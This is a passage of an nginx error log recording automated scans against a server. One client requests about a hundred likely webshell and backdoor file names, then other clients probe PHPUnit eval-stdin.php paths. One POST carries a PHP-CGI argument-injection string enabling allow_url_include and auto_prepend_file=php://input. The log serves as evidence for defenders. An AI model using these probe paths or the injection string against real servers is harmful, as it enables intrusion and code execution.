HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:41 [error] 422#422: *310342 open() "/var/www/html/wp-includes/Text/about.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:41 [error] 422#422: *310342 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:41 [error] 422#422: *310342 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:41 [error] 422#422: *310342 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:42 [error] 422#422: *310342 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:42 [error] 422#422: *310342 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /shell20211028.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:42 [error] 422#422: *310342 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:42 [error] 422#422: *310342 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:43 [error] 422#422: *310342 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:43 [error] 422#422: *310342 open() "/var/www/html/baxa1.phP8" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /baxa1.phP8 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:44 [error] 422#422: *310342 open() "/var/www/html/page.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /page.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:44 [error] 422#422: *310342 open() "/var/www/html/tempfuns.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /tempfuns.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:44 [error] 422#422: *310342 open() "/var/www/html/past.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /past.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:44 [error] 422#422: *310342 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /log.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:45 [error] 422#422: *310342 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:45 [error] 422#422: *310342 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:45 [error] 422#422: *310342 open() "/var/www/html/sf.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /sf.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:46 [error] 422#422: *310342 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //simple.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:46 [error] 422#422: *310342 open() "/var/www/html/admiin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /admiin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:46 [error] 422#422: *310342 open() "/var/www/html/9v6.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /9v6.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:46 [error] 422#422: *310342 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:47 [error] 422#422: *310342 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:47 [error] 422#422: *310342 open() "/var/www/html/F0x.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /F0x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:47 [error] 422#422: *310342 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:47 [error] 422#422: *310342 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:48 [error] 422#422: *310342 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:48 [error] 422#422: *310342 open() "/var/www/html/up4.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /up4.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:48 [error] 422#422: *310342 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:48 [error] 422#422: *310342 open() "/var/www/html/dbc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /dbc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:48 [error] 422#422: *310342 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:49 [error] 422#422: *310342 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /content.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:49 [error] 422#422: *310342 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:49 [error] 422#422: *310342 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:49 [error] 422#422: *310342 open() "/var/www/html/ws35.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws35.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:50 [error] 422#422: *310342 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:50 [error] 422#422: *310342 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:50 [error] 422#422: *310342 open() "/var/www/html/wp-freya.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-freya.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:50 [error] 422#422: *310342 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:51 [error] 422#422: *310342 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:51 [error] 422#422: *310342 open() "/var/www/html/ant.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ant.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:51 [error] 422#422: *310342 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:51 [error] 422#422: *310342 open() "/var/www/html/gecko.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /gecko.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:52 [error] 422#422: *310342 open() "/var/www/html/ws29.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws29.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:52 [error] 422#422: *310342 open() "/var/www/html/1100.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /1100.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:52 [error] 422#422: *310342 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws46.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:52 [error] 422#422: *310342 open() "/var/www/html/ws43.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws43.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:53 [error] 422#422: *310342 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:53 [error] 422#422: *310342 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:53 [error] 422#422: *310342 open() "/var/www/html/rtx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /rtx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:53 [error] 422#422: *310342 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:54 [error] 422#422: *310342 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:54 [error] 422#422: *310342 open() "/var/www/html/blox.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /blox.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:54 [error] 422#422: *310342 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:54 [error] 422#422: *310342 open() "/var/www/html/mh.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /mh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:55 [error] 422#422: *310342 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:55 [error] 422#422: *310342 open() "/var/www/html/O-Simple.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /O-Simple.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:55 [error] 422#422: *310342 open() "/var/www/html/smklh.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /smklh.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:55 [error] 422#422: *310342 open() "/var/www/html/mans.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /mans.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:55 [error] 422#422: *310342 open() "/var/www/html/horeg.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /horeg.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:56 [error] 422#422: *310342 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:56 [error] 422#422: *310342 open() "/var/www/html/to.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /to.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:56 [error] 422#422: *310342 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:57 [error] 422#422: *310342 open() "/var/www/html/fz.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /fz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:57 [error] 422#422: *310342 open() "/var/www/html/mini.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /mini.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:57 [error] 422#422: *310342 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //x.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:58 [error] 422#422: *310342 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:58 [error] 422#422: *310342 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:58 [error] 422#422: *310342 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /moon.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:58 [error] 422#422: *310342 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ws46.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:59 [error] 422#422: *310342 open() "/var/www/html/wp-22.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-22.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:59 [error] 422#422: *310342 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //user.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:59 [error] 422#422: *310342 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:40:59 [error] 422#422: *310342 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:00 [error] 422#422: *310342 open() "/var/www/html/wp-ana.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-ana.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:00 [error] 422#422: *310342 open() "/var/www/html/cwclass.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /cwclass.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:00 [error] 422#422: *310342 open() "/var/www/html/87.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /87.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:01 [error] 422#422: *310342 open() "/var/www/html/error.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /error.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:01 [error] 422#422: *310342 open() "/var/www/html/redi.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /redi.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:01 [error] 422#422: *310342 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:02 [error] 422#422: *310342 open() "/var/www/html/image.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /image.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:02 [error] 422#422: *310342 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:02 [error] 422#422: *310342 open() "/var/www/html/indo.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /indo.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:03 [error] 422#422: *310342 open() "/var/www/html/0xx.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /0xx.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:03 [error] 422#422: *310342 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:04 [error] 422#422: *310342 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:04 [error] 422#422: *310342 open() "/var/www/html/style.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /style.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:04 [error] 422#422: *310342 open() "/var/www/html/manager.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /manager.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:04 [error] 422#422: *310342 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:05 [error] 422#422: *310342 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:05 [error] 422#422: *310342 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php? HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:05 [error] 422#422: *310342 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /file.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:05 [error] 422#422: *310342 open() "/var/www/html/11.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /11.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:05 [error] 422#422: *310342 open() "/var/www/html/s.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /s.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:06 [error] 422#422: *310342 open() "/var/www/html/sid3.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /sid3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:06 [error] 422#422: *310342 open() "/var/www/html/ng.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /ng.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:06 [error] 422#422: *310342 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:06 [error] 422#422: *310342 open() "/var/www/html/webix.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /webix.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:07 [error] 422#422: *310342 open() "/var/www/html/az.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /az.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:07 [error] 422#422: *310342 open() "/var/www/html/hans.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET /hans.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:07 [error] 422#422: *310342 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //403.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:07 [error] 422#422: *310342 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 06:41:08 [error] 422#422: *310342 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 4.217.220.52, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/19 07:25:02 [error] 422#422: *310378 open() "/var/www/html/login.asp" failed (2: No such file or directory), client: 95.214.55.246, server: localhost-nginx-proxy-manager, request: "GET /login.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 07:31:44 [error] 422#422: *310385 open() "/var/www/html/ReportServer" failed (2: No such file or directory), client: 172.174.211.117, server: localhost-nginx-proxy-manager, request: "GET /ReportServer HTTP/1.1", host: "91.82.83.208" +2026/01/19 08:01:44 [error] 421#421: *311902 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:02:55 [error] 421#421: *311905 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:26 [error] 422#422: *311925 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:27 [error] 422#422: *311925 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:27 [error] 422#422: *311925 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:27 [error] 422#422: *311925 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:27 [error] 422#422: *311925 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:27 [error] 422#422: *311925 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:28 [error] 422#422: *311925 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: 